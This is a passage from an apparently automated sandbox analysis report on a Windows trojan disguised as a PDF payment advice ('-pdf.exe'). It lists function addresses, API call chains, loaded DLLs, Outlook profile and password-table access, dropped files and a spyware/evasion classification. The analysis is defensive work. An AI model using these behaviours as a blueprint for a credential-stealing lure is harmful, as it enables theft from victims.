            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeCode function: 4_2_374E6E9F4_2_374E6E9F
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeCode function: 4_2_374E6EA04_2_374E6EA0
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeCode function: 4_2_374EBD884_2_374EBD88
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeCode function: 4_2_374EB4EC4_2_374EB4EC
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeCode function: 4_2_374ECC914_2_374ECC91
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeCode function: 4_2_374EE3474_2_374EE347
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeCode function: 4_2_374EEBF74_2_374EEBF7
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeCode function: 4_2_374EDA9C4_2_374EDA9C
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeCode function: 4_2_374EB9444_2_374EB944
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeCode function: 4_2_374EC1F24_2_374EC1F2
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeCode function: 4_2_374E78484_2_374E7848
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeCode function: 4_2_374EF0544_2_374EF054
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeCode function: 4_2_37A896C84_2_37A896C8
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeCode function: 4_2_37A886504_2_37A88650
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeCode function: 4_2_37A8BDF04_2_37A8BDF0
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeCode function: 4_2_37A89D104_2_37A89D10
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeCode function: 4_2_37A8A3604_2_37A8A360
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeCode function: 4_2_37A8BA974_2_37A8BA97
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeCode function: 4_2_37A8A9B04_2_37A8A9B0
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeCode function: 4_2_37A80FA84_2_37A80FA8
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeCode function: 4_2_37A867B04_2_37A867B0
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeCode function: 4_2_37A8AFF84_2_37A8AFF8
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeCode function: 4_2_37A8AFF74_2_37A8AFF7
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeCode function: 4_2_37A867C04_2_37A867C0
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeCode function: 4_2_37A85F014_2_37A85F01
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeCode function: 4_2_37A85F104_2_37A85F10
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeCode function: 4_2_37A83F604_2_37A83F60
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeCode function: 4_2_37A83F704_2_37A83F70
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeCode function: 4_2_37A836C04_2_37A836C0
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeCode function: 4_2_37A836C24_2_37A836C2
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeCode function: 4_2_37A896C74_2_37A896C7
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeCode function: 4_2_37A82E104_2_37A82E10
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeCode function: 4_2_37A856604_2_37A85660
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeCode function: 4_2_37A856594_2_37A85659
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeCode function: 4_2_37A886524_2_37A88652
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeCode function: 4_2_37A84DA04_2_37A84DA0
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeCode function: 4_2_37A84DB04_2_37A84DB0
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeCode function: 4_2_37A89D0F4_2_37A89D0F
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeCode function: 4_2_37A825604_2_37A82560
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeCode function: 4_2_37A8255F4_2_37A8255F
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeCode function: 4_2_37A81CB04_2_37A81CB0
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeCode function: 4_2_37A874C84_2_37A874C8
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeCode function: 4_2_37A874C14_2_37A874C1
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeCode function: 4_2_37A86C094_2_37A86C09
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeCode function: 4_2_37A814004_2_37A81400
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeCode function: 4_2_37A86C184_2_37A86C18
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeCode function: 4_2_37A843C84_2_37A843C8
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeCode function: 4_2_37A83B184_2_37A83B18
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeCode function: 4_2_37A83B1A4_2_37A83B1A
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeCode function: 4_2_37A863684_2_37A86368
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeCode function: 4_2_37A87B624_2_37A87B62
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeCode function: 4_2_37A8A35F4_2_37A8A35F
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeCode function: 4_2_37A85AB84_2_37A85AB8
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeCode function: 4_2_37A852084_2_37A85208
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeCode function: 4_2_37A852074_2_37A85207
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeCode function: 4_2_37A832684_2_37A83268
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeCode function: 4_2_37A8A9AF4_2_37A8A9AF
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeCode function: 4_2_37A829B84_2_37A829B8
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeCode function: 4_2_37A8F12D4_2_37A8F12D
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeCode function: 4_2_37A8F1304_2_37A8F130
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeCode function: 4_2_37A821084_2_37A82108
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeCode function: 4_2_37A848204_2_37A84820
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeCode function: 4_2_37A848194_2_37A84819
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeCode function: 4_2_37A870704_2_37A87070
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeCode function: 4_2_37A800404_2_37A80040
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeCode function: 4_2_37A818584_2_37A81858
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeCode function: 4_2_37FBE7C84_2_37FBE7C8
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeCode function: 4_2_37FBD66F4_2_37FBD66F
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeCode function: 4_2_37FB83284_2_37FB8328
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeCode function: String function: 00402BBF appears 51 times
            Source: PAYMENT ADVICE 750013-1012449943-81347-pdf.exe, 00000004.00000002.3001687513.00000000049A3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs PAYMENT ADVICE 750013-1012449943-81347-pdf.exe
            Source: PAYMENT ADVICE 750013-1012449943-81347-pdf.exe, 00000004.00000002.3021194584.0000000034AA7000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs PAYMENT ADVICE 750013-1012449943-81347-pdf.exe
            Source: PAYMENT ADVICE 750013-1012449943-81347-pdf.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@3/8@5/5
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeCode function: 0_2_004032A0 EntryPoint,SetErrorMode,GetVersion,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,InitOnceBeginInitialize,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_004032A0
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeCode function: 4_2_004032A0 EntryPoint,SetErrorMode,GetVersion,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,InitOnceBeginInitialize,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,4_2_004032A0
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeCode function: 0_2_004045B4 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_004045B4
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeCode function: 0_2_00402095 CoCreateInstance,0_2_00402095
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\rapiditetensJump to behavior
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeMutant created: NULL
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeFile created: C:\Users\user\AppData\Local\Temp\nsk2FB0.tmpJump to behavior
            Source: PAYMENT ADVICE 750013-1012449943-81347-pdf.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeFile read: C:\Users\desktop.iniJump to behavior
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: PAYMENT ADVICE 750013-1012449943-81347-pdf.exe, 00000004.00000002.3021658495.0000000034D43000.00000004.00000800.00020000.00000000.sdmp, PAYMENT ADVICE 750013-1012449943-81347-pdf.exe, 00000004.00000002.3021658495.0000000034D35000.00000004.00000800.00020000.00000000.sdmp, PAYMENT ADVICE 750013-1012449943-81347-pdf.exe, 00000004.00000002.3021658495.0000000034D25000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: PAYMENT ADVICE 750013-1012449943-81347-pdf.exeReversingLabs: Detection: 57%
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeFile read: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exe "C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exe"
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeProcess created: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exe "C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exe"
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeProcess created: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exe "C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exe"Jump to behavior
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeSection loaded: shfolder.dllJump to behavior
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeSection loaded: riched20.dllJump to behavior
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeSection loaded: usp10.dllJump to behavior
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeSection loaded: msls31.dllJump to behavior
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeSection loaded: textinputframework.dllJump to behavior
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeSection loaded: coreuicomponents.dllJump to behavior
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeSection loaded: schannel.dllJump to behavior
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeSection loaded: rasapi32.dllJump to behavior
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeSection loaded: rasman.dllJump to behavior
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeSection loaded: rtutils.dllJump to behavior
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeSection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
            Source: Benchership141.lnk.0.drLNK file: ..\..\..\mindevrdigt\boghandlermedhjlperens.tor
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
            Source: PAYMENT ADVICE 750013-1012449943-81347-pdf.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

            Data Obfuscation

            barindex
            Source: Yara matchFile source: 00000000.00000002.2073192363.0000000003E37000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.2998753015.0000000002C17000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeCode function: 0_2_10001B18 GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,0_2_10001B18
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeCode function: 0_2_10002DE0 push eax; ret 0_2_10002E0E
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeFile created: C:\Users\user\AppData\Local\Temp\nsv30DA.tmp\System.dllJump to dropped file
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
